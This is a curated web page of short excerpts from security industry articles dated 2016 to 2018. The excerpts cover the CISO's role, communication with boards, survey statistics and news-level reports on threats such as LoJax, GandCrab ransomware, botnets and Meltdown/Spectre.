Trending in Security Operations

Cyber Security Operations Topics, Trends, and Articles

The first 100 days of the new CISO: how to avoid the “curse of firefighting”

The Digital Transformation People article, November 1, 2018

How an incoming executive needs to approach such a complex role is also a hot debate. Many experts – including us ­– have written about this and have framed the topic using the “first 100 days” journalistic cliché. In our own series, we took issue with the fact that most consultants’ analysis and suggestions fail to consider the incoming CISO within the broader context and organisational complexity of the firm.

In large organisations, no function exists in a vacuum, and getting anything done requires aligning your strategy with other stakeholders’ priorities, business cycles, and budget cycles. It will always take time, as well as political and managerial acumen, but nothing in our opinion that could not be set in motion to an extent with the first 6 months in office.

4 Dangerous Security Assumptions to Avoid

CSO article, November 1, 2018

Many organizations take steps to guard against data breaches, employing new policies, tools and strategies that make them feel protected, but their defenses may not be as strong as they think. Unfortunately, this false sense of security is all-too-easy to come by.

It’s not unusual for companies to start out in the right direction but fall short in their efforts because one specific area is overlooked. Achieving a high standard of cybersecurity requires a thorough, holistic view of the risks and a robust, continuous effort. The truth is that many organizations do one or two things right and then put their feet up, content to bask in the warm, but erroneous sensation that they’re safe.

Here are four common statements that indicate a false sense of security.

Cybersecurity Professional Impressions on Cloud-native Security

CSO article, October 31, 2018

Organizations use cloud-native security controls, but they really want central management for cloud security across heterogeneous clouds.

 In a recent research survey, ESG asked a panel of 232 security and IT professionals a series of questions about cloud-native security (i.e. security controls, management, and monitoring options built into cloud infrastructure and offered by cloud service providers).  Here are a few of the data points ESG uncovered...

Cyber Is a Boardroom Issue in 2018

Infosecurity Magazine article, October 30, 2018

Based on studies and interviews with corporate board members and chief information security officers (CISOs), the Cyber Balance Sheet, published by Focal Point Data Risk and produced by the Cyentia Institute, found that boardrooms are engaging in more conversations about security.

While the talks about cyber risk are more commonplace, the C-suite and security leaders are still struggling to effectively translate security risks into an effective decision-making framework that enables the business to operate within its proper risk appetite.

Communication is Broken Between CISOs and the Rest of the Business

SecurityWeek article, October 29, 2018


Time was, the rest of the business might have bought into the idea IT security was unique among business functions, with processes, standards and language too technical to be understood by ordinary business folk.  Cybersecurity management is technical, the thinking went, therefore the results could only be expressed in technical language, too.  

That era came to a crashing end in the last few years when crippling malware and devastating data breaches made cyber risks a clear and present danger for the entire organization. Now, board members and senior management are likely to wave off CISO techno-speak and push to get their questions answered on their terms.

The CSO Guide to Top Security Conferences, 2018-19

CSO article, October 25, 2018


There is nothing like attending a face-to-face event for career networking and knowledge gathering, and we don’t have to tell you how helpful it can be to get a hands-on demo of a new tool or to have your questions answered by experts.

Fortunately, plenty of great conferences are coming up in the months ahead.

CSO Online’s calendar of upcoming security conferences makes it easy to find the events that matter the most to our community.

6 Cybersecurity Tools You'll Need to Know About in 2019

HackerNoon article, October 24, 2018

Whether it’s maintaining transparent and reliable voting systems, combatting DDoS attacks at the G20 summit and WTO conference, or even protecting a corporation’s new batch of smart contracts, proactive solutions are necessary in an era when cybercrime seems to reach a new all-time high every few months.

In this vein, smart IT experts and even regular users would be wise to keep an eye on these up-and-comers in the sector. A place on this list means that the company has identified a crucial area of vulnerability in the status quo and develops a unique, airtight solution.

Questions to Ask Before Accepting that CISO Job Offer

LinkedIn article by Gary Hayslip, October 21, 2018

In writing earlier articles and releasing them to our community I have been asked by several people if I could make a list of questions to ask at an interview. These would be questions you could ask the interviewer and interview committee to make sure the role you want is the right one for you. In the past I have had positions I wanted but when asking these questions, the answers I received painted a picture I wanted nothing to do with and I walked away from the position. What is important is not all of these questions will apply to your situation but hopefully they will give you some ideas on what to ask during your interview so you feel comfortable that the role you are interviewing for is a good fit for you and your career. 

How CEOs And Boards Can Manage The Strategic Impacts Of Cyber Risk

Forbes article, October 15, 2018

The digitalization of the business landscape offers never-before-seen opportunities but also makes organizations more vulnerable to cyber attacks and breaches. At the highest level, leaders are focused on maturing their cyber risk programs and dealing with the fact that cyber risk is everywhere—from the light switch in the office to the systems storing the organization’s most sensitive information. 

Irfan Saif, principal at Deloitte Risk and Financial Advisory, Deloitte & Touche LLP, shares his perspective on how organizations are currently managing cyber risk.

Gartner Top 10 Strategic Technology Trends for 2019

Gartner Report, October 15, 2018

The Gartner Top 10 Strategic Technology trends highlight changing or not yet widely recognized trends that will impact and transform industries through 2023. 

Trend No. 1: Autonomous Things

Trend No. 2: Augmented Analytics

Trend No. 3: AI-driven Development

Trend No. 4: Digital Twins

Trend No. 5: Empowered Edge

Trend No. 6: Immersive Technology

Trend No. 7: Blockchain

Trend No. 8: Smart Spaces

Trend No. 9: Digital Ethics and Privacy

Trend No. 10: Quantum Computing

Sednit APT Group Uses First UEFI Rootkit Detected in the Wild to Execute LoJax Malware

SecurityIntelligence article, October 4, 2018

For the first time ever, researchers discovered a Unified Extensible Firmware Interface (UEFI) rootkit in the wild that they believe the Sednit advanced persistent threat (APT) group used to execute LoJax malware.

Researchers at ESET observed an attack campaign distributing LoJax and three types of tools. The first component dumped system information into a text file. The second tool read the contents of the Serial Peripheral Interface (SPI) flash memory to save an image of the system’s firmware. The third wrote a UEFI module to the SPI flash memory and installed a UEFI rootkit that’s responsible for dropping LoJax onto the machine.

Cyber Security Is A Business Risk, Not Just An IT Problem

Forbes article, from October, 2017

Gone are the days when companies could pass the headaches of cyber security to the IT department, as it has become more of a business issue too. This is especially important as businesses are more digitized, meaning they are exposed to an increasing number of threats if they do not manage the risk of security properly. While more Hong Kong businesses understand the value of shifting their mindset in cyber security from questioning if their business will experience an attack, to when will they be threatened and how will they respond, they still need to address cyber security as the business risk it is.

In Telstra’s recent Cyber Security report, data shows that 59% of Asian organizations experienced a business-interrupting security breach at least once a month. This comes down to the increase in digitization across the board. As we move towards digitization, the number and type of devices requiring enhanced security measures increase too. Mobiles, tablets, wearables and Internet of Things (IoT) enabled devices all fall short in the traditional approach of securing network perimeters by a firewall. Additionally, new technologies such as artificial intelligence and machine learning are providing attackers with enhanced tools for more complex attacks.

Form factor wars: Cloud-based or on-premises security technologies?

CSO article, September 26, 2018

While most organizations are willing to consider cloud-based or on-premises security solutions, nearly one-third still demand the control associated with on-premises.

Cybersecurity professionals are paid to be paranoid and tend to want to control everything they can to minimize surprises or third-party dependencies. This has always been the case with regards to security technology. Historically, CISOs mistrusted managed services, preferring instead to “own” the deployment and operations associated with their security technologies. 

While cultural attitudes toward security control remain today, demand- and supply-side changes are influencing new security technology decisions.

Lucy Gang Debuts with Unusual Android MaaS Package

ThreatPost article, September 20, 2018

The threat actor’s Android-focused cyber-arms package, dubbed Black Rose Lucy, is limited in reach for now, but clearly has global ambitions.

There’s a fresh bloom in the malware-as-a-service garden: Researchers have uncovered a new Russian-speaking threat actor hawking a proprietary cyber-weapon dubbed “Black Rose Lucy.”

The offering is a malware-as-a-service (MaaS) bundle with two parts, consisting of a controlling web interface (which acts as a dashboard and command-and-control server), and malware that targets Android systems. Infected devices are enslaved to a botnet that’s placed at an operator’s disposal, according to analysis from Check Point.

5 biggest cybersecurity challenges at smaller organizations

CSO article, September 19, 2018

Manual processes, security complexity, and a lack of support from business management plague SMBs.

Aside from security incidents and subsequent actions, what are the major cybersecurity challenges experienced by small and mid-sized organizations? 

ESG asked this question in a survey of 400 IT and cybersecurity professionals working at SMB firms. The results are as follows (multiple responses were accepted):

  • 28% of respondents say their biggest cybersecurity challenge is that their organization depends upon too many manual or informal processes for cybersecurity.
  • 27% of respondents say their biggest cybersecurity challenge is that it is difficult to manage the complexity of too many disconnected cybersecurity tools.
  • 27% of respondents say their biggest cybersecurity challenge is that business managers don’t understand or support strong cybersecurity.
  • 25% of respondents say their biggest cybersecurity challenge is that their organization doesn’t provide an appropriate level of cybersecurity training for non-technical employees, leading to increased risk.
  • 24% of respondents say their biggest cybersecurity challenge is that their organization lacks the right skills to deal with modern types of cyber threats.

The SOC Gets a Makeover

DARK Reading article, September 6, 2018

Today's security operations center is all about reducing the number of alerts with emerging technologies - and enhancing old-school human collaboration. Here's how some real-world SOCs are evolving.

Blame it on the success of the SIEM. For many security operations center (SOC) managers, the security information and event management system was both a blessing and a curse: It was a way to consolidate and correlate security alerts from firewalls, routers, IDS/IPS, antivirus software, and servers, for example, into a centralized console. But with the recent wave of new security tools, threat intelligence feeds, and constantly mutating threats, SOCs are drowning in anywhere from thousands to a million security alerts daily. 

The most important attributes of a cybersecurity platform

CSO article, August 29, 2018

Information security professionals want coverage across major threat vectors, central management, and technologies for prevention, detection, and response in any security platform.

ESG has seen an ongoing cybersecurity technology trend that goes something like this:

  1. Enterprise organizations address cybersecurity using disconnected point tools. This strategy is no longer adequate, as it impacts security efficacy and adds operational overhead.
  2. Security teams address these problems by consolidating and integrating the security tools they use. Many are building security technology architectures a la SOAPA (i.e. security operations and analytics platform architecture).
  3. Seeing this trend in process, security technology vendors push internal development teams to integrate point tools across their portfolio. They then pitch integrated security "platforms" to customers.

Spotlight Shines on Role of CISO

Wall Street Journal article, from June, 2016

Not long ago, many senior management teams regarded their risk executives as “business prevention officers.” For that reason, risk managers often felt like salmon swimming upstream, their advice lost in the press of doing business, according to University of Maryland Executive-in-Residence Clifford Rossi. But large-scale “black swan” events like the 2008 financial crisis demonstrated the perils of leaping after business opportunities without first taking a long, hard look at risk. Since then, chief risk officers (CROs) have gained enormously in respect and prestige and are now seen as “business protectors” essential to success. This has led a number of organizations to increase their risk management budgets (some by as much as 100 percent), raise CRO pay, and make the position a senior management and, in some cases, board-level role, “The Wall Street Journal” reports.

Cybersecurity decisions that can’t be automated

CSO article, September 17, 2018

Encourage those inside and outside your team to identify and challenge daily assumptions in order to adapt to change, think differently and make smarter, faster security related decisions.

Cybersecurity’s future in reducing incident response time is to automate the process. In other words, the process of marking an attack, aggregating key data, identifying the actual threat, assembling the tools and executing actions needs to be as close to machine speed as possible.

Unfortunately, most companies are still outsourcing only 30 percent of the decision-making to AI/cybersecurity programs that allow this, when a minimum of 70 percent is the healthier goal. 

Nevertheless, reaching that goal does not free a CSO or anyone in an organization from making key “human” decisions in the AI/cyber arena. Processes that include automated programs and algorithms are just one part of the job.

CISOs and the Quest for Cybersecurity Metrics Fit for Business

Security Week article, September 17, 2018

Never-ending breaches, ever-increasing regulations, and the potential effect of brand damage on profits has made cybersecurity a mainstream board-level issue. It has never been more important for cybersecurity controls and processes to be in line with business priorities.

A recent survey by security firm Varonis highlights that business and security are not fully aligned; and while security teams feel they are being heard, business leaders admit they aren't listening.

The problem is well-known: security and business speak different languages. Since security is the poor relation of the two, the onus is absolutely on security to drive the conversation in business terms. When both sides are speaking the same language, aligning security controls with business priorities will be much easier.

Well-presented metrics are the common factor understood by both sides and could be used as the primary driver in this alignment. The reality, however, is this isn’t always happening.

A Quantified Approach To Cybersecurity Risk Management

LinkedIn article by Steve King, September 16, 2018

Cybersecurity Risk Assessment should be a hot topic these days. How else can you not only convince your board and management team that you need to do something to protect against cyber-attacks, but also be able to communicate for once in a language they understand

What if Equifax knew that their risk was quantified at more than $100 million along with a high probability of an ugly event actually happening. Do you think they might have installed that patch? I think they probably would have. Because as thing stand right now (one year later) they might not be in business by the second anniversary.

Cybersecurity Skills Report: Today’s CISO is Shifting Toward Strategic Business Enablement

CSO article, September 11, 2018

Businesses and government agencies of all sizes are experiencing cyber attacks that are growing in both frequency and complexity. Cybercriminals, nation-states, and a host of other bad actors are developing new tactics, tools, and procedures to circumvent modern cybersecurity solutions. We are increasingly seeing targeted attacks employing customized malware and the ready availability of dark web market tools and services covering every aspect of the cyber kill chain. In fact, a recent Fortinet Global Threat Landscape Report shows that virtually no firm is immune, with 96% of firms experiencing at least one severe exploit.

In order to address these new threats while maintaining operations, growing the business, executing the mission, and implementing digital transformation, organizations are finding that success requires a balanced focus on both business and security requirements. This development is reflected in the changing roles and responsibilities of the Chief Information Security Officer (CISO). Public sector agencies and private enterprises are now seeking CISOs with the deep technical expertise, organizational leadership, and business acumen needed to achieve business objectives.

PowerShell Obfuscation Ups the Ante on Antivirus

ThreatPost article, September 12, 2018

A new malware sample using a rare obfuscation technique has been spotted that uses the features of PowerShell, a tool that comes built in to Microsoft Windows. Analysis from Cylance shows that the tactic succeeds in bypassing most antivirus products.

Cylance researchers stumbled across a malware file using a PowerShell obfuscation method while looking into a set of malicious scripts that had low antivirus detection. The file was a ZIP file containing both a PDF document and VBS script, and it was flagged by just three antivirus products.

CISOs recommend future actions for their organizations

CSO article, from September 5, 2018

Each year, ESG conducts a research project with the Information Systems Security Association (ISSA) on the mindset of cybersecurity professionals. (The 2017 report is available here.) As part of last year’s research, we asked respondents to identify the top actions their organizations should take in the future to improve cybersecurity. We then looked at this data based upon respondents’ roles, so we could look at the specific recommendations from CISOs (or other titles with equivalent job descriptions). 

Using "Digital Twins" to inform Cyber Security Operations

LinkedIn article by Scott Foote, September 3, 2018

The idea of a “Digital Twin” is not new. Engineers and other professionals have been using digital simulation models for many decades to provide the contextual awareness that informs their decision making. These digital simulations are simply formal, detailed versions of the anecdotally-collected mental models that most of us carry around in our heads. With the added benefit of course that digital models can be shared for continuous evolution, verification & validation; and persisted to survive the turnover of personalities and staff.

What is new… is the application of these digital models to the high-tempo, high-risk decision making of Cyber Security Operations.

The surge toward digital transformation continues to compound the complexities of contemporary business models as well as the underlying information technology that supports them. This exponential growth in inter-dependencies and rapid adoption of leading-edge technologies creates RISK. A direct result of the ever growing attack surface that adversaries are increasingly better prepared to exploit. While Cyber Defenders are hard pressed to keep pace, struggling to maintain effective comprehension of their “enterprise architecture” as it continuously morphs in pursuit of greater business value.

Why CISOs Should Make Friends With Their CMOs

DARK Reading article, August 27, 2018

A partnership between IT security and marketing could offer many benefits to each group - and to the entire enterprise.

It might not seem like CISOs and CMOs have much in common, but both executives stand to gain by becoming allies.

Every day cybersecurity factors, such as bad breach publicity and phishing impersonators, erode enterprise brands — thereby diminishing the effectiveness of a CMO's daily efforts. Brand value goes down, email marketing ROI gets trashed, and customer churn increases, all of which reflect poorly on the chief marketer. CMOs need help from CISOs to lock down risk factors. On the flip side, CISOs grapple with a number of challenges that CMOs could help them with, including insecure marketing technology and communication processes, breach response communication, and inadequate budget for preserving brand value.

While CISOs and CMOs might never become corporate besties, there's clearly a lot of room for some mutual back-scratching. Here are some proof points to show why a partnership between this pair of executives can benefit both parties, as well as their companies.

What are small organizations doing about cybersecurity?

CSO article, August 21, 2018

According to a survey by ESG, firms with 50 to 499 employees are spending more money, purchasing security product suites, and outsourcing security tasks to MSSPs.

From the survey, two-thirds of firms with 50 to 499 employees have experienced at least one cybersecurity incident over the past few years, leading to lost productivity and business disruptions.  Survey respondents claim that the biggest contributing factors to these cybersecurity incidents included human error, a lack of knowledge about cyber risk, and new IT initiatives lacking proper cybersecurity oversight.

Based upon this data, many small organizations don’t have the skills, staff, or cybersecurity infrastructure to keep up with the threat landscape. 

So, what are they doing to bridge this gap?  Spending more money on cybersecurity for starters.  Fifteen percent of organizations claim they will substantially increase their cybersecurity budgets while another 53 percent will increase their cybersecurity budget somewhat.

Balanced Skills for CISOs

LinkedIn article by Luiz Firmino, August 2, 2018

CISOs must have a keen emotional intelligence to allow them to quickly detect whether their audience is closed to suggestions or possibly even hostile to the suggested or required changes. One of the CISO’s key roles is as translator of tech-related terms and threats into a language appropriate for his or her audience. When conversing with business leaders, the CISO needs to be able to communicate clearly and effectively, in the language of the business, through explanations, metaphors or visual aids. This type of interaction is likely to increase as the CISOs communicate ways to reduce cyber risks to other groups.

Ultimately, the CISO’s currency is trust. CISOs must earn the trust of the rest of the executive team and maintain that trust. In turn, executives and boards have to trust that the CISO will be an accurate vessel through which their wishes will be communicated and executed. Just as importantly, they have to trust that the CISO will be honest and transparent in reporting the true security posture of the organization.

The Good & Bad News About Today's Cybersecurity Investment Landscape

DARK Reading article, July 25, 2018

Lots of things keep CISOs up at night. But instead of guessing what CISOs want, investors and vendors should incorporate customer feedback throughout product ideation and development cycles.

Cyberwar: What happens when a nation-state cyber attack kills?

ZDNet article, from July 24, 2018

A cyber attack that kills someone is getting ever more likely. What happens then is a big -- and scary --question.

The increasing sophistication and power of state-backed cyber attacks has led some experts to fear that, sooner or later, by design or by accident, one of these incidents will result in somebody getting killed.

It might sound far-fetched, but a former head of the UK's intelligence agency has already warned about the physical threat posed by cyber attacks and the potential damage they could do.

Leveraging Security to Enable Your Business

DarkReading article,  February 23rd, 2018

"Wouldn't it be great if everyone were trustworthy? No bad guys trying to break in and steal your cyber assets, and everyone is able to do their jobs unobstructed and without fear of negative consequences? That's when businesses succeed, costs go down, productivity skyrockets, and everyone is happy.

Unfortunately, this is not the world we live in. With both external cyberattacks and insider threats on the rise, companies must protect themselves from threats in their own backyard and the far-reaching corners of the cyber world. Because the risks are so high, many businesses have employed security processes and systems that encroach further and further into the business, hindering daily productivity and causing mass frustration among employees. In the most extreme cases, security has become employee enemy No. 1."

The global cyber war is heating up: Why businesses should be worried

CSO article,  February 22nd, 2018

"Nation-state attackers typically go after political targets: the Democratic National Committee, government agencies, critical infrastructure, and defense contractors. It's become increasingly clear that any company, in any industry, could be affected, either as a result of being a deliberate target or as collateral damage in a wider attack.

Campaigns like NotPetya can hit any company, of any size, and even deliberate, targeted, advanced attacks can hit any industry. "Private entities are being targeted every day," says Adam Meyers, VP of intelligence at CrowdStrike."

GDPR is coming, and many organizations aren’t ready

CSO article,  February 22nd, 2018

"Each year, ESG surveys around 700 cybersecurity and IT professionals as part of its annual IT spending intentions research (note: I am an ESG employee). In this year’s survey, ESG asked respondents several questions about General Data Protection Regulation (GDPR) readiness.

What we found is alarming. With only a few months until the regulation goes into effect, only 11 percent of those surveyed say they are completely prepared and only 33 percent say their incident response plan meets the GDPR requirement for breach disclosure in 72 hours."

Know Thyself Better Than The Adversary - ICS Asset Identification and Tracking

New SANS blog,  February 22nd, 2018

"Globally, we've passed the point where cyber attackers only target and disrupt information technology networks and business applications. Adversaries have stepped up their attack skills targeting ICS in recent years. However, defense is do-able! Facilities can mature their cybersecurity posture to ensure early detection and protection against these growing threats.

With foundational security already in place, the Active Cyber Defense Cycle (ACDC) empowers ICS defenders to actively hunt for advanced threats in their network, a process which drives informed incident response and quick protective actions.

The different phases of the Active Cyber Defense Cycle support one another to enable proactive security. The four ACDC phases are (1) Asset Identification & Network Security Monitoring, (2) Incident Response, (3) Threat & Environment Manipulation, and (4) Threat Intelligence Consumption. This repeatable process, which requires dedicated assets, involves using and sharing threat intelligence, knowing network layouts and assets, actively hunting for threats, rapidly scoping events of interest, and kicking off containment or protection actions to neutralize threats."

Is This The Year of Reckoning for the CISO - Part One

InfoSecurity article,  February 20th, 2018

"Whichever way you look at it, the role of CISO is becoming an increasingly unattractive prospect. Whether it’s the sheer scale and variety of 24/7 threats facing businesses today, the complex compliance requirements that must be fulfilled, or the growing scrutiny of cybersecurity operations at board level, it’s almost an unwinnable position.

Despite this, the global demand for experienced CISOs has never been higher. Interestingly, we’re now in a situation where many CISOs simply aren’t ready to rise to the enormous challenge presented to them and in many cases, security teams are failing to effectively secure the interests of the business."

Taking cybersecurity beyond a compliance-first approach

CSO article,  February 19th, 2018

"With high profile security breaches continuing to hit the headlines, organizations are clearly struggling to lock down data against the continuously evolving threat landscape. Yet these breaches are not occurring at companies that have failed to recognize the risk to customer data; many have occurred at organizations that are meeting regulatory compliance requirements to protect customer data.

Given the huge investment companies in every market are making in order to comply with the raft of regulation that has been introduced over the past couple of decades, this continued vulnerability is – or should be – a massive concern. Regulatory compliance is clearly no safeguard against data breach."

Introduction to Threat Detection and Response

LinkedIn article,  February 5th, 2018

"Cybersecurity starts with the realisation that adversaries in cyberspace pose a threat to the well being of individuals and organisations. The leaders of an organisation may have been informed by the news, law enforcement agencies, compliance officer, a friend, consultant, etc., about the potential risks associated with operating connected information systems.

The first step to managing the cybersecurity risk is to assess it. The risk assessment results in a risk treatment plan and shapes the cybersecurity strategy of the organisation. If a cybersecurity risk cannot be avoided, transferred, or accepted, mitigating controls and capabilities should be implemented to ensure it is reduced to an acceptable level."

Cyber Advisory Board Experts on Threats to the U.S. Grid

The Cipher Brief article,  February 4th, 2018

"Former Deputy Secretary of State Robert Work, a member of The Cipher Brief’s Cyber Advisory Board, says potential attacks on the U..S power grid would most likely come in two flavors. “A localized attack, such as an attack on a city’s power grid, could be mounted by any number of malicious hackers, minor states or terrorists. And a more widespread “counter-value” strike by a large state competitor could target assets that are not a military threat but that an opponent values, such as cities and civilian populations. Counterforce targeting goes after an opponent’s military forces and capabilities.”

Work warns that the U.S. has largely turned away from the thinking behind counter value targeting, but says that the U.S.’ great power competitors have not. “A widespread counter-value cyberattack on the U.S. power grid that knocked out large parts of the grid for a significant period of time could cause widespread disruption throughout the United States, incalculable economic loss, and potentially loss of life. Such an attack would not be easy. But it is not out of the realm of possibility. And I am less than certain we have hardened the grid enough to thwart a concerted, large-scale cyberattack.”

Russian Dark Web ad for New GandCrab Ransomware-as-a-Service

SC Media article,  February 2nd, 2018

"Researchers investigating the newly discovered GandCrab ransomware have learned how its authors are marketing the malicious program as a ransomware-as-a-service package to potential buyers on the dark web. According to LMNTRIX, the ad offers a partner program, whereby members split GandCrab's profits with the developers 60:40. Additionally, large partners are given the opportunity to increase their share to 70 percent. The authors also offer technical support and updates to buyers.

However, there are caveats: Partners must not target countries in the former Soviet Republics that now comprise the Commonwealth of Independent States, or their accounts will be deleted. Furthermore,"Partners must apply to use the ransomware, and there is a limited amount of ‘seats' available," LMNTRIX explained in an email to SC Media.”

Latest IoT Botnet Displays Evidence of a Halfway Clever Botmaster

Boing Boing article,  February 1st, 2018

"The amazing and frightening thing about the Mirai botnet's reign of terror wasn't that it was a super-sophisticated cyberweapon: rather, it was a clumsy, amateurish fuggly hack that turned out to have been produced by a couple of dum-dums with a Minecraft racket.

A new IoT botnet called Satori is spreading more slowly than Mirai did -- it's compromised about 40,000 devices so far -- but it's mutating a lot faster than Mirai ever did, with regular infusions of code designed to exploit new vulnerabilities. Security researchers fear that a Mirai-alike botnet with a competent patching regime could be far more devastating than Mirai ever was.”

Lazarus Group, Fancy Bear Most Active Threat Groups in 2017

DARK Reading article,  January 31st, 2018

"The busiest threat actor groups of 2017 were Sofacy (otherwise known as Fancy Bear or APT28) and the Lazarus Group, security experts report. As these groups ramped up activity, threat actors operating out of China became quiet.

Analysts at AlienVault leveraged data from its Open Threat Exchange (OTX) threat intelligence sharing platform to take a broad look at threat patterns from last year. They found the most frequently referenced threat group in 2017 was Sofacy.

The second most active group was Lazarus, which is believed to operate out of North Korea (or Democratic People's Republic of Korea, DPRK).”

Securing IoT Devices and Traffic between IoT Sensors and Cloud Analytics

IIoT World article,  January 24th, 2018

"It is well documented that IoT devices have introduced new security risks. Most IoT devices must interface to cloud based management and analytics engines and therefore support a TCP/IP stack for this communication. Our IoT endpoint software is designed to augment a device’s TCP/IP stack with very little overhead, providing authentication to the cloud services.

Informational components are all about the sensors. Sensors have a calibration that provides information within specific tolerances providing known levels of data fidelity. Sensors may produce different information at different tolerance levels, but the receiving analytic system must know what tolerance to apply to each reported measurement. This enables the sensors to provide the necessary input for bounded operation.”

Changing Role of the CISO

McAfee blog,  January 4th, 2018

With the growth of digital world, we have seen growth in cyberthreats. These range from the annoying to the downright catastrophic. And as these threats evolve and permutate, we have also seen the evolution of a formerly overlooked player: the Chief Information Security Officer, or CISO.

Not only is the CISO’s role changing, but so is his/her relationship to the organization they work in. Where once many reported to the Chief Information Officer (CIO), many now report directly to the CEO or the Board. In their new role, the CISOs also need new skills. 

Meltdown and Spectre CPU Flaws Affect Intel, ARM, AMD Processors

Article in The Hacker News,  January 3rd, 2018

Unlike the initial reports suggested about Intel chips being vulnerable to some severe ‘memory leaking’ flaws, full technical details about the vulnerabilities have now been emerged, which revealed that almost every modern processor since 1995 is vulnerable to the issues.

Disclosed today by Google Project Zero, the vulnerabilities potentially impact all major CPUs, including those from AMD, ARM, and Intel—threatening almost all PCs, laptops, tablets, and smartphones, regardless of manufacturer or operating system. 

The Disconnect Between Cybersecurity & the C-Suite

Dark Reading article,  December 28th, 2017

Despite all the attention that massive hacks and other breaches have attracted in recent years, organizations everywhere still struggle to comprehend the scale of and manage emerging cyber-risks. Of the more than 9,500 senior executives in 122 countries who participated in PricewaterhouseCoopers' Global State of Information Security Survey (GSISS) 2018, only 39% say they are very confident in their attribution capabilities — that is, their ability to detect and trace cyberattacks.

As highlighted in the GSISS report, US infrastructure is still susceptible to what the World Economic Forum (WEF) deems in its Global Risk Report 2017 as the prime business risk in North America: "large-scale cyber-attacks or malware causing large economic damages, geopolitical tensions, or widespread loss of trust in the internet."

Honeywell Survey reveals that 45% of industrial companies don’t have cybersecurity leader

CISO Magazine article,  December 11th, 2017

A recent survey conducted by a software industrial company indicated that a number of industrial companies are not taking cybersecurity seriously enough. The “Putting Industrial Cyber Security at the Top of the CEO Agenda” survey, that was conducted by Honeywell in collaboration with LNS Research, included responses from 130 strategic decision makers from industrial companies across North America, Europe, and other parts of the globe.

Forty-five percent of the respondents agreed to the fact that their organization lacks a reliable enterprise leader for cybersecurity. Forty percent have a chief of cybersecurity while 15% plan to get a cybersecurity incharge within the next year. When it comes to the companies’ manufacturing plant, only 35% of the organizations have an established role for cybersecurity.

ESG's Jon Olstik: 3 Advanced Prevention Technologies Expected to Grow in 2018

CSO Magazine article,  December 8th, 2017

Olstik believes 'advanced prevention' sits at the intersection of two other cybersecurity trends:

  • Software-defined security functionality. Software-defined everything makes it easier to deploy, configure, and scale security controls.
  • Artificial intelligence. AI uses algorithms to comb through mountains of data to increase detection/blocking efficacy, provide granular risk scoring, and fine-tune decision making.

In the past, many security controls were based upon rules/heuristics and often required ample time for deployment, configuration, customization, etc. When the two advanced prevention trends come together, they produce security controls that are easier to deploy, easier to operate, and offer more accurate detection/blocking rates. Thus, organizations can deploy advanced prevention controls, decrease the attack surface, reduce security noise, and focus precious human resources on high-value tasks.

Gartner Forecasts Worldwide Security Spending Will Reach $96 Billion in 2018, Up 8 Percent from 2017

Gartner Press Release,  December 7th, 2017

Gartner, Inc. forecasts worldwide enterprise security spending to total $96.3 billion in 2018, an increase of 8 percent from 2017. Organizations are spending more on security as a result of regulations, shifting buyer mindset, awareness of emerging threats and the evolution to a digital business strategy.

"Overall, a large portion of security spending is driven by an organization's reaction toward security breaches as more high profile cyberattacks and data breaches affect organizations worldwide," said Ruggero Contu, research director at Gartner. "Cyberattacks such as WannaCry and NotPetya, and most recently the Equifax breach, have a direct effect on security spend, because these types of attacks last up to three years."

This is validated by Gartner's 2016 security buying behavior survey*. Of the 53 percent of organizations that cited security risks as the No. 1 driver for overall security spending, the highest percentage of respondents said that a security breach is the main security risk influencing their security spending.